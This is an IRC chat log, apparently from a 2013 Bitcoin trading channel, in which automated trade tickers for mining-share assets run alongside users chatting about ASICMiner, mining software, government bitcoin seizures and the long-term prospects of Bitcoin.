[HAVELOCK] [ASICM] 20 @ 0.03381002 = 0.6762 BTC [-] Jun 24 16:25:25 [BTCTC] [TAT.ASICMINER] 19 @ 0.03403 = 0.6466 BTC [-] Jun 24 16:25:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.03402 = 0.6804 BTC [-] Jun 24 16:25:29 [BTCTC] [TAT.ASICMINER] 16 @ 0.034 = 0.544 BTC [-] Jun 24 16:26:09 [HAVELOCK] [ASICM] 3 @ 0.03381001 = 0.1014 BTC [-] Jun 24 16:26:22 [HAVELOCK] [ASICM] 5 @ 0.03381 = 0.1691 BTC [-] Jun 24 16:26:39 [HAVELOCK] [ASICM] 97 @ 0.03381 = 3.2796 BTC [-] Jun 24 16:27:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00328 BTC [+] Jun 24 16:27:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00256 BTC [-] Jun 24 16:27:21 [HAVELOCK] [ASICM] 140 @ 0.0338 = 4.732 BTC [-] Jun 24 16:27:31 [HAVELOCK] [ASICM] 50 @ 0.0333 = 1.665 BTC [-] Jun 24 16:27:40 [HAVELOCK] [ASICM] 1 @ 0.032 BTC [-] Jun 24 16:28:48 [HAVELOCK] [ASICM] 184 @ 0.032 = 5.888 BTC [-] Jun 24 16:31:14 [HAVELOCK] [SDICE] 2 @ 0.200201 = 0.4004 BTC [-] Jun 24 16:33:09 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [-] Jun 24 16:37:05 ThickAsThieves: https://bitfunder.com/asset/CoinBr.iDiff-E open nao Jun 24 16:37:20 [BTCTC] [ASICMINER-PT] 1 @ 3.4004 BTC [+] Jun 24 16:37:49 if anyone wonders why it's so cheap, it got subdivided(what is the correct word?) by 100 Jun 24 16:38:13 [BTCTC] [ASICMINER-PT] 1 @ 3.4003 BTC [-] Jun 24 16:38:38 tricky! Jun 24 16:39:03 http://letstalkbitcoin.com/post/53700133097/users-bitcoins-seized-by-dea Jun 24 16:39:35 aww only 20% potential Jun 24 16:40:00 how am is supposed to double my money Jun 24 16:40:16 if the asic vendors blow, the price will go lower Jun 24 16:40:29 hence your task is to convince me so :D Jun 24 16:40:41 look at the history! Jun 24 16:40:45 no one ever ships Jun 24 16:40:48 :) Jun 24 16:42:46 https://bitcointalk.org/index.php?topic=217104.msg2562621#msg2562621 Jun 24 16:42:51 Block Erupter USB Sales [New Sales Policy with New Price] Jun 24 16:43:58 [BTCTC] [ASICMINER-PT] 1 @ 3.4003 BTC [-] Jun 24 16:44:00 [BTCTC] [ASICMINER-PT] 6 @ 3.4002 = 20.4012 BTC [-] Jun 24 16:44:02 [BTCTC] [ASICMINER-PT] 18 @ 3.4 = 61.2 BTC [-] Jun 24 16:46:43 [BTCTC] [ASICMINER-PT] 16 @ 3.4 = 54.4 BTC [-] Jun 24 16:47:30 http://jcph.am/2013/06/24/usb-erupter-tutorial/ Jun 24 16:47:33 usb erupter tutorial | jcph.am Jun 24 16:47:41 sell asicminer! Jun 24 16:47:46 errrrr Jun 24 16:47:49 buy it i mean! Jun 24 16:48:20 [BTCTC] [TAT.ASICMINER] 20 @ 0.034001 = 0.68 BTC [+] Jun 24 16:48:58 [BTCTC] [ASICMINER-PT] 1 @ 3.3701 BTC [-] Jun 24 16:49:00 [BTCTC] [ASICMINER-PT] 3 @ 3.3602 = 10.0806 BTC [-] Jun 24 16:49:28 "If you are used to the nuances of cgminer, maybe it is time to learn bfgminer, because it was WAY EASIER to get working." actually, cgminer autodetects the thing, there is nothing to add Jun 24 16:49:29 [BTCTC] [TAT.ASICMINER] 76 @ 0.034 = 2.584 BTC [-] Jun 24 16:49:32 at least on linux Jun 24 16:51:28 this particular box was windows. i'm not a cgminer hater Jun 24 16:51:42 bfgminer was easier i swear. i tried th latest versions of each Jun 24 16:53:07 [BTCTC] [ASICMINER-PT] 1 @ 3.399 BTC [+] Jun 24 16:53:40 well now's there's a cgminer 3.3.0 Jun 24 16:53:47 these fucker put out a new version daily Jun 24 16:53:54 conman and luke Jun 24 16:54:30 fucking 10 year Jun 24 16:54:48 all asset classes are correlated Jun 24 16:54:59 gold, bonds, stocks, bitcoins :( Jun 24 16:55:13 was tiberiusv right? Jun 24 16:55:19 about what Jun 24 16:55:40 SP500 and bitcoin will peak and collapse at the same time Jun 24 16:56:22 the money has to go somewhere right? Jun 24 16:57:16 cgminer in windows needs funky driver too to detect icarus Jun 24 16:57:24 it's a pin i tried again Jun 24 16:57:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.034 = 0.272 BTC [-] Jun 24 16:57:32 bfgminer wins AND I hate admitting it Jun 24 16:57:33 [BTCTC] [TAT.ASICMINER] 14 @ 0.0339 = 0.4746 BTC [-] Jun 24 16:57:34 [BTCTC] [TAT.ASICMINER] 77 @ 0.033679 = 2.5933 BTC [-] Jun 24 16:57:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.033602 BTC [-] Jun 24 16:58:34 ThickAsThieves: no it can just be destroyed. Jun 24 16:58:43 These two things should not be correlated Jun 24 16:58:44 http://yhoo.it/12dxuwF Jun 24 16:58:48 Vanguard IT Bond ETF ETF Chart - Yahoo! Finance Jun 24 16:58:59 [BTCTC] [ASICMINER-PT] 1 @ 3.388 BTC [-] Jun 24 16:59:01 [BTCTC] [ASICMINER-PT] 1 @ 3.389 BTC [+] Jun 24 16:59:03 [BTCTC] [ASICMINER-PT] 1 @ 3.398999 BTC [+] Jun 24 16:59:04 [BTCTC] [ASICMINER-PT] 1 @ 3.399 BTC [+] Jun 24 17:00:00 not to mention http://bitcoincharts.com/charts/mtgoxUSD#rg5ztgSzm1g10zm2g25 Jun 24 17:00:44 [BTCTC] [TAT.ASICMINER] 39 @ 0.034599 = 1.3494 BTC [+] Jun 24 17:01:32 what is the correlation though? Jun 24 17:01:42 gox stops supporting USD Jun 24 17:01:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.034599 BTC [+] Jun 24 17:01:47 so bonds go down? Jun 24 17:02:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002752 BTC [+] Jun 24 17:02:58 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.002751 = 0.0303 BTC [-] Jun 24 17:03:00 [BTCTC] [TAT.ASICMINER] 49 @ 0.034599 = 1.6954 BTC [+] Jun 24 17:03:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.033603 = 0.0672 BTC [-] Jun 24 17:03:02 [BTCTC] [S.DICE-PT] 100 @ 0.00224 = 0.224 BTC [-] Jun 24 17:03:08 or market notices arb opportunity MOnday morning so bonds go down? Jun 24 17:03:46 [BTCTC] [S.DICE-PT] 82 @ 0.0022 = 0.1804 BTC [-] Jun 24 17:03:48 [BTCTC] [S.DICE-PT] 100 @ 0.0022 = 0.22 BTC [-] Jun 24 17:03:50 i cant figure a connection that doesnt require leaping over coincidence Jun 24 17:06:42 US and China tighten monetary supply, all asset classes lose value Jun 24 17:06:55 hopefully housing will too Jun 24 17:09:01 [BTCTC] [ASICMINER-PT] 1 @ 3.399 BTC [+] Jun 24 17:09:03 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Jun 24 17:09:25 [BTCTC] [ASICMINER-PT] 3 @ 3.360001 = 10.08 BTC [-] Jun 24 17:11:39 [BTCTC] [DMS.MINING] 10 @ 0.0164 = 0.164 BTC [-] Jun 24 17:13:31 [BTCTC] [TAT.ASICMINER] 30 @ 0.0346 = 1.038 BTC [+] Jun 24 17:13:56 [BTCTC] [BTC-GOLD] 1 @ 0.047759 BTC [+] Jun 24 17:14:18 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [-] Jun 24 17:15:37 [BTCTC] [BITVPS] 2 @ 0.001339 = 0.0027 BTC [+] Jun 24 17:16:40 [BTCTC] [RSM] 1 @ 0.02449 BTC [+] Jun 24 17:17:16 [BTCTC] [ASICMINER-PT] 1 @ 3.360001 BTC [-] Jun 24 17:17:18 [BTCTC] [ASICMINER-PT] 1 @ 3.3015 BTC [-] Jun 24 17:17:19 [BTCTC] [ASICMINER-PT] 3 @ 3.3011 = 9.9033 BTC [-] Jun 24 17:18:31 [BTCTC] [B.YABMC] 1 @ 0.004249 BTC [+] Jun 24 17:18:35 DHS internment camps coming soon Jun 24 17:19:18 [BTCTC] [PAJKA.BOND] 1 @ 0.0597 BTC [-] Jun 24 17:20:21 [HAVELOCK] [ASICM] 23 @ 0.034298 = 0.7889 BTC [+] Jun 24 17:21:32 [BTCTC] [GSDPT] 10 @ 0.00249 = 0.0249 BTC [+] Jun 24 17:21:44 [BTCTC] [DMS.PURCHASE] 1 @ 0.054062 BTC [-] Jun 24 17:21:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.033603 = 1.6802 BTC [-] Jun 24 17:21:59 [BTCTC] [TAT.ASICMINER] 9 @ 0.033602 = 0.3024 BTC [-] Jun 24 17:22:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.033602 = 0.672 BTC [-] Jun 24 17:22:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.0335 = 0.067 BTC [-] Jun 24 17:22:03 [BTCTC] [TAT.ASICMINER] 6 @ 0.0335 = 0.201 BTC [-] Jun 24 17:22:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 24 17:22:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 24 17:22:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.033 = 0.132 BTC [-] Jun 24 17:22:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.229719 BTC [-] Jun 24 17:22:40 [BTCTC] [S.BBET-PT] 1 @ 0.00176 BTC [+] Jun 24 17:25:03 [HAVELOCK] [ASICM] 80 @ 0.034 = 2.72 BTC [-] Jun 24 17:29:55 [HAVELOCK] [ASICM] 1 @ 0.03429699 BTC [+] Jun 24 17:29:58 http://www.zerohedge.com/news/2013-06-24/bank-china-declares-moratorium-transfers-online-banking-counters-inoperable Jun 24 17:30:05 Bank Of China Declares Moratorium On Transfers, Online Banking; Counters Inoperable | Zero Hedge Jun 24 17:30:28 tech support Jun 24 17:30:34 plztofixbank Jun 24 17:33:46 [HAVELOCK] [ASICM] 2 @ 0.03300007 = 0.066 BTC [-] Jun 24 17:33:47 [HAVELOCK] [ASICM] 121 @ 0.03300006 = 3.993 BTC [-] Jun 24 17:33:48 [HAVELOCK] [ASICM] 77 @ 0.03300005 = 2.541 BTC [-] Jun 24 17:34:21 [BTCTC] [ASICMINER-PT] 1 @ 3.302 BTC [+] Jun 24 17:34:31 it's rather impenetrable... but i can see that spilling over into btc drama, if it causes avalons to stop shipping :) Jun 24 17:35:37 [HAVELOCK] [ASICM] 10 @ 0.03300105 = 0.33 BTC [+] Jun 24 17:35:38 haha nice: The ICBC bank system failure comes trouble "money shortage", inevitably lead to speculation that many people guess the bank is not money. Jun 24 17:37:22 [MPEX] [S.MPOE] 9300 @ 0.00078525 = 7.3028 BTC [+] Jun 24 17:37:45 [BTCTC] [ASICMINER-PT] 1 @ 3.3021 BTC [+] Jun 24 17:37:48 [BTCTC] [ASICMINER-PT] 1 @ 3.302001 BTC [-] Jun 24 17:39:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.034599 = 0.0692 BTC [+] Jun 24 17:40:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 24 17:41:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.0323 = 0.323 BTC [-] Jun 24 17:42:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.032203 = 0.0966 BTC [-] Jun 24 17:42:12 [BTCTC] [TAT.ASICMINER] 33 @ 0.032202 = 1.0627 BTC [-] Jun 24 17:42:13 [BTCTC] [TAT.ASICMINER] 28 @ 0.032202 = 0.9017 BTC [-] Jun 24 17:43:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.032202 = 0.0966 BTC [-] Jun 24 17:44:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.032107 BTC [-] Jun 24 17:44:07 topic: Jun 24 17:44:15 What do you think bitcoin needs most? Jun 24 17:44:53 silence and about 5 years to carry on unnoticed Jun 24 17:45:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0322 = 0.322 BTC [+] Jun 24 17:45:13 too late for that Jun 24 17:45:21 seriously Jun 24 17:45:26 yeah, seriously Jun 24 17:45:28 i think it's an important question Jun 24 17:45:29 too late Jun 24 17:45:59 not what i meant kako Jun 24 17:46:51 [BTCTC] [ASICMINER-PT] 1 @ 3.3012 BTC [-] Jun 24 17:47:17 what product, service, direction, behavior, etc, would most serve the longterm health of bitcoin Jun 24 17:47:35 event, Jun 24 17:47:38 whatever Jun 24 17:48:21 Is it user adoption? Jun 24 17:48:25 banking? Jun 24 17:48:32 hoarding? Jun 24 17:48:45 bitcoin-only services? Jun 24 17:48:57 imho, spec and scalability plan Jun 24 17:49:12 that is a good one Jun 24 17:49:40 almost bought diff-o thinking someone miscalculated by 2 decimals Jun 24 17:49:55 sneaky Jun 24 17:50:05 bitcoin-only services Jun 24 17:50:14 aknap3: i announced it both here and there Jun 24 17:50:37 pankkake, question then Jun 24 17:50:48 I did read before buying -- hence did not buy :) Jun 24 17:50:53 what bitcoin-only service can truly exist Jun 24 17:51:03 dont they all just cash out to fiat? Jun 24 17:51:12 I don't know. especially since most prices things are indexed on fiat Jun 24 17:51:27 escrow Jun 24 17:51:28 -things Jun 24 17:51:38 so what part of the bitcoin economy is missing Jun 24 17:51:48 [BTCTC] [TAT.ASICMINER] 33 @ 0.0344 = 1.1352 BTC [+] Jun 24 17:51:50 to allow staying within it Jun 24 17:51:53 banks Jun 24 17:51:54 Need to commoditize John K Jun 24 17:52:01 worst idea ever Jun 24 17:52:10 [HAVELOCK] [ASICM] 1 @ 0.03378 BTC [+] Jun 24 17:52:14 is it? Jun 24 17:52:23 the ability to park your money safely is "missing" Jun 24 17:52:25 but not really Jun 24 17:52:27 but it is Jun 24 17:54:20 price volatility is an issue as well Jun 24 17:54:39 i'm just trying to get a whole picture Jun 24 17:54:44 well that's what i mean. these asset exchanges and such function like banks kinda Jun 24 17:54:44 of where we need to go Jun 24 17:54:49 and what steps are missing Jun 24 17:55:02 the volatility goes away when people park their funds Jun 24 17:55:10 forget about it and simply trust it Jun 24 17:55:20 yes but right now all those parked funds are going into mining Jun 24 17:55:28 which is kinda like treading water Jun 24 17:55:44 my funds are still parked yo Jun 24 17:55:48 profits ultimately leak out into fiat Jun 24 17:55:57 i'm not saying i'm not helping bid up asicminer and sell their stuff Jun 24 17:56:04 but i'd be dumb not to Jun 24 17:56:50 in sense we need that way to destroy fiat when a bitcoin is adopted Jun 24 17:57:28 nope, fiat will destroy itself Jun 24 17:57:31 hoarding sorta does that, whether by investing or speculating in general Jun 24 17:57:46 but as long as people have to live primarily fiat Jun 24 17:58:04 how can bitcoin ever be more than a temporary thing Jun 24 17:58:09 so are we having the currency vs. commodity argument Jun 24 17:58:16 i have no idea Jun 24 17:58:19 i think we just fell into it somehow Jun 24 17:58:42 paying your bills and living off bitcoin is "currency" Jun 24 17:58:49 i'm actually not interested in that Jun 24 17:58:57 the topic stems from thinking about how its silly that bitcoin right now mostly exists to feed into itself through mining Jun 24 17:59:01 converting my bitcoin to whatever when it suits me Jun 24 17:59:07 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00305 = 0.0305 BTC [+] Jun 24 17:59:08 that's the commodity aspect Jun 24 17:59:33 and how anytime someone profits from bitcoin Jun 24 17:59:39 it is ultimately measured in fiat Jun 24 17:59:44 and realized in fiat Jun 24 17:59:51 yep Jun 24 18:00:08 ThickAsThieves: did you do some analysis that suggests it? isn't gambling largest part of economy? Jun 24 18:00:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.034399 BTC [-] Jun 24 18:00:27 i did not Jun 24 18:00:35 i have a boased view Jun 24 18:00:40 biased* Jun 24 18:00:41 [BTCTC] [ASICMINER-PT] 1 @ 3.347999 BTC [+] Jun 24 18:00:45 but i'm not sure it matters Jun 24 18:01:17 [BTCTC] [ASICMINER-PT] 1 @ 3.349 BTC [+] Jun 24 18:01:26 [BTCTC] [ASICMINER-PT] 1 @ 3.348 BTC [-] Jun 24 18:01:38 is the answer that bitocin profits must be used toward new bitcoin services and investments? Jun 24 18:01:45 feed the monster Jun 24 18:01:49 not the fiat workd Jun 24 18:01:53 world* Jun 24 18:02:58 ThickAsThieves: you were speaking something about government using mtgox rate? Jun 24 18:03:04 here you go: http://www.newstatesman.com/economics/2013/06/bitcoins-seized-us-government-agency Jun 24 18:03:51 [HAVELOCK] [ASICM] 2 @ 0.03428797 = 0.0686 BTC [+] Jun 24 18:03:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.034399 = 0.4128 BTC [-] Jun 24 18:04:14 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003097 = 0.0093 BTC [+] Jun 24 18:05:53 lol Jun 24 18:06:03 so they entrapped a SR dealer? Jun 24 18:06:32 http://yro.slashdot.org/story/13/06/24/0146237/california-sends-a-cease-and-desist-order-to-the-bitcoin-foundation Jun 24 18:06:44 turns into a conversation about weed on slashdot Jun 24 18:06:47 hehe Jun 24 18:06:55 wow, just over 11 bitcoins Jun 24 18:06:58 sometimes i get lost in these comments Jun 24 18:07:00 California Sends a Cease and Desist Order To the Bitcoin Foundation - Slashdot Jun 24 18:07:09 talking about it like it's 11 Billion or something Jun 24 18:07:19 that cease and desist take sthe cake Jun 24 18:07:21 [HAVELOCK] [ASICM] 10 @ 0.03428797 = 0.3429 BTC [+] Jun 24 18:07:22 i mean Jun 24 18:07:28 how retarded do you have to be Jun 24 18:07:33 it makes the government look stupid Jun 24 18:07:46 or they have set precedent for something ridiculous Jun 24 18:08:20 they give the foundation too much credit Jun 24 18:08:23 well, the 11 bitcoins appears to have been spent Jun 24 18:08:29 thinking they actually provide any service at all Jun 24 18:09:11 so now we can track the DEA's seized coins Jun 24 18:09:13 fun! Jun 24 18:09:28 what does the bitcoin foundation do with the funds from donators and memberships Jun 24 18:09:29 time for someone to start a known gov addy list Jun 24 18:09:29 siezed on april 12, spent on april 22 Jun 24 18:09:34 do they pay it all to employees Jun 24 18:09:48 I seriously doubt the DEA was the one to do the spending :) Jun 24 18:09:56 presumably they cash it out to boay for fruit and hotels Jun 24 18:10:03 i know gavin gets paid Jun 24 18:10:07 they probably think they still have the bitcoin Jun 24 18:10:10 but if they've sold any of it Jun 24 18:10:15 that would be an issue Jun 24 18:10:21 the foundation incorporated with satoshi as founding member... would be fun if that resulted in him being chased by some TLAs Jun 24 18:10:37 Plot Twist: BFL is the DEA Jun 24 18:12:46 jcpham: they sue each other and pay lawyers from it Jun 24 18:12:57 oh yeah right! Jun 24 18:12:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.0342 = 0.171 BTC [-] Jun 24 18:13:36 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [-] Jun 24 18:23:23 [BTCTC] [BASIC-MINING] 1 @ 0.999999 BTC [+] Jun 24 18:23:59 [BTCTC] [TAT.ASICMINER] 27 @ 0.033 = 0.891 BTC [-] Jun 24 18:24:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.03439 = 0.8598 BTC [+] Jun 24 18:27:25 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003089 = 0.1545 BTC [-] Jun 24 18:27:26 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.00309 = 0.4635 BTC [+] Jun 24 18:27:28 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003098 = 0.1549 BTC [+] Jun 24 18:27:29 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.0031 = 0.1116 BTC [+] Jun 24 18:28:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0028 BTC [-] Jun 24 18:28:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002711 BTC [-] Jun 24 18:30:21 [BTCTC] [BASIC-MINING] 1 @ 1 BTC [+] Jun 24 18:30:23 [BTCTC] [BASIC-MINING] 8 @ 1.089 = 8.712 BTC [+] Jun 24 18:30:24 [BTCTC] [BASIC-MINING] 3 @ 1.09 = 3.27 BTC [+] Jun 24 18:30:25 [BTCTC] [BASIC-MINING] 1 @ 1.09 BTC [+] Jun 24 18:30:26 [BTCTC] [BASIC-MINING] 12 @ 1.1 = 13.2 BTC [+] Jun 24 18:31:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.033 = 0.264 BTC [-] Jun 24 18:31:26 [BTCTC] [TAT.ASICMINER] 7 @ 0.032999 = 0.231 BTC [-] Jun 24 18:31:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.032203 = 0.1288 BTC [-] Jun 24 18:31:29 [BTCTC] [TAT.ASICMINER] 16 @ 0.032201 = 0.5152 BTC [-] Jun 24 18:31:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.0322 = 0.1932 BTC [-] Jun 24 18:31:33 [BTCTC] [TAT.ASICMINER] 40 @ 0.0321 = 1.284 BTC [-] Jun 24 18:31:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.032 BTC [-] Jun 24 18:31:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.032 = 0.96 BTC [-] Jun 24 18:31:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.032 = 0.16 BTC [-] Jun 24 18:32:03 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 24 18:32:17 [BTCTC] [ASICMINER-PT] 1 @ 3.368999 BTC [+] Jun 24 18:33:43 [BTCTC] [ASICMINER-PT] 1 @ 3.368999 BTC [+] Jun 24 18:34:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.03418 = 0.1367 BTC [+] Jun 24 18:35:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.03419 = 0.3077 BTC [+] Jun 24 18:36:08 [MPEX] [S.MPOE] 15322 @ 0.0007877 = 12.0691 BTC [+] Jun 24 18:36:10 [MPEX] [S.MPOE] 2090 @ 0.00078819 = 1.6473 BTC [+] Jun 24 18:37:36 [BTCTC] [TAT.ASICMINER] 16 @ 0.03419 = 0.547 BTC [+] Jun 24 18:38:40 [BTCTC] [TAT.ASICMINER] 26 @ 0.0342 = 0.8892 BTC [+] Jun 24 18:40:27 [BTCTC] [TAT.ASICMINER] 27 @ 0.03435 = 0.9275 BTC [+] Jun 24 18:42:32 [BTCTC] [ASICMINER-PT] 2 @ 3.368999 = 6.738 BTC [+] Jun 24 18:42:35 [BTCTC] [ASICMINER-PT] 2 @ 3.369 = 6.738 BTC [+] Jun 24 18:42:37 [BTCTC] [ASICMINER-PT] 2 @ 3.379 = 6.758 BTC [+] Jun 24 18:42:38 [BTCTC] [ASICMINER-PT] 1 @ 3.397 BTC [+] Jun 24 18:42:40 [BTCTC] [ASICMINER-PT] 2 @ 3.399 = 6.798 BTC [+] Jun 24 18:43:38 [BTCTC] [CRYPTO-TRADE] 8 @ 0.199001 = 1.592 BTC [-] Jun 24 18:44:14 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199 = 0.597 BTC [-] Jun 24 18:44:16 [BTCTC] [CRYPTO-TRADE] 7 @ 0.199 = 1.393 BTC [-] Jun 24 18:44:22 [BTCTC] [BASIC-MINING] 1 @ 1.099999 BTC [-] Jun 24 18:44:24 [BTCTC] [BASIC-MINING] 2 @ 1.1 = 2.2 BTC [+] Jun 24 18:44:25 [BTCTC] [BASIC-MINING] 22 @ 1.1 = 24.2 BTC [+] Jun 24 18:46:22 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 24 18:46:53 [BTCTC] [S.DICE-PT] 1 @ 0.002499 BTC [+] Jun 24 18:48:45 [BTCTC] [BITVPS] 8 @ 0.001339 = 0.0107 BTC [+] Jun 24 18:48:47 [BTCTC] [BITVPS] 10 @ 0.00134 = 0.0134 BTC [+] Jun 24 18:48:48 [BTCTC] [BITVPS] 13 @ 0.00135 = 0.0176 BTC [+] Jun 24 18:48:49 [BTCTC] [BITVPS] 19 @ 0.001399 = 0.0266 BTC [+] Jun 24 18:49:19 [BTCTC] [TAT.ASICMINER] 73 @ 0.03435 = 2.5076 BTC [+] Jun 24 18:49:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.03435 = 0.1031 BTC [+] Jun 24 18:49:25 [BTCTC] [S.DICE-PT] 56 @ 0.002499 = 0.1399 BTC [+] Jun 24 18:49:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.03435 = 0.1031 BTC [+] Jun 24 18:49:38 [HAVELOCK] [ASICM] 1 @ 0.03311 BTC [-] Jun 24 18:49:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [-] Jun 24 18:49:55 [MPEX] [S.MPOE] 260 @ 0.00078819 = 0.2049 BTC [+] Jun 24 18:49:57 [MPEX] [S.MPOE] 5600 @ 0.00078834 = 4.4147 BTC [+] Jun 24 18:50:04 [MPEX] [S.MPOE] 9089 @ 0.00078988 = 7.1792 BTC [+] Jun 24 18:50:43 [MPEX] [S.MPOE] 4750 @ 0.00078525 = 3.7299 BTC [-] Jun 24 18:50:46 [MPEX] [S.MPOE] 10750 @ 0.00078518 = 8.4407 BTC [-] Jun 24 18:50:48 [BTCTC] [BITVPS] 1 @ 0.001399 BTC [+] Jun 24 18:51:32 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.003207 = 0.1187 BTC [+] Jun 24 18:51:33 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003208 = 0.0128 BTC [+] Jun 24 18:51:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00323 BTC [+] Jun 24 18:51:36 [MPEX] [S.MPOE] 4000 @ 0.00078518 = 3.1407 BTC [-] Jun 24 18:51:37 [BTCTC] [TAT.VIRTUALMINE] 93 @ 0.00338 = 0.3143 BTC [+] Jun 24 18:51:38 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.003387 = 0.0542 BTC [+] Jun 24 18:51:39 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003389 = 0.3389 BTC [+] Jun 24 18:51:40 [BTCTC] [TAT.VIRTUALMINE] 224 @ 0.003877 = 0.8684 BTC [+] Jun 24 18:51:42 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003878 = 0.0078 BTC [+] Jun 24 18:51:43 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.003878 = 0.0776 BTC [+] Jun 24 18:51:43 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00388 = 0.97 BTC [+] Jun 24 18:51:44 [BTCTC] [TAT.VIRTUALMINE] 130 @ 0.0039 = 0.507 BTC [+] Jun 24 18:51:45 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0039 = 0.39 BTC [+] Jun 24 18:51:46 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.00398 = 0.1473 BTC [+] Jun 24 18:53:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.034199 = 0.0684 BTC [-] Jun 24 18:55:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.03112 BTC [-] Jun 24 18:57:38 [BTCTC] [ASICMINER-PT] 1 @ 3.399 BTC [+] Jun 24 18:57:40 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 24 19:01:50 [BTCTC] [BASIC-MINING] 3 @ 1.1 = 3.3 BTC [+] Jun 24 19:01:51 [BTCTC] [BASIC-MINING] 1 @ 1.15 BTC [+] Jun 24 19:01:53 [BTCTC] [BASIC-MINING] 10 @ 1.2 = 12 BTC [+] Jun 24 19:01:55 [BTCTC] [BASIC-MINING] 11 @ 1.2 = 13.2 BTC [+] Jun 24 19:02:10 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 24 19:02:43 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [+] Jun 24 19:03:25 [BTCTC] [BITVPS] 10 @ 0.0014 = 0.014 BTC [+] Jun 24 19:03:28 [BTCTC] [ESECURITYSABTC] 2 @ 0.183781 = 0.3676 BTC [-] Jun 24 19:03:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.032 BTC [+] Jun 24 19:04:14 [BTCTC] [ASICMINER-PT] 2 @ 3.429 = 6.858 BTC [+] Jun 24 19:04:20 [BTCTC] [ESECURITYSABTC] 1 @ 0.183781 BTC [-] Jun 24 19:06:08 [BTCTC] [ASICMINER-PT] 1 @ 3.333333 BTC [-] Jun 24 19:06:10 [BTCTC] [ASICMINER-PT] 1 @ 3.332 BTC [-] Jun 24 19:06:12 [BTCTC] [ASICMINER-PT] 1 @ 3.331001 BTC [-] Jun 24 19:06:14 [BTCTC] [ASICMINER-PT] 1 @ 3.331001 BTC [-] Jun 24 19:06:47 [BTCTC] [ASICMINER-PT] 1 @ 3.43 BTC [+] Jun 24 19:09:08 [BTCTC] [S.BBET-PT] 9 @ 0.00176 = 0.0158 BTC [+] Jun 24 19:15:26 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Jun 24 19:17:25 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [-] Jun 24 19:17:54 [MPEX] [S.MPOE] 4700 @ 0.00078886 = 3.7076 BTC [+] Jun 24 19:18:41 [BTCTC] [S.DICE-PT] 43 @ 0.002379 = 0.1023 BTC [-] Jun 24 19:19:44 .bait Jun 24 19:19:47 http://25.media.tumblr.com/tumblr_m3ljui08XG1qzck00o1_500.jpg Jun 24 19:20:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.034198 = 0.0684 BTC [+] Jun 24 19:23:56 [BTCTC] [B.YABMC] 32 @ 0.004005 = 0.1282 BTC [-] Jun 24 19:23:58 [BTCTC] [B.YABMC] 27 @ 0.004 = 0.108 BTC [-] Jun 24 19:24:33 [HAVELOCK] [ASICM] 4 @ 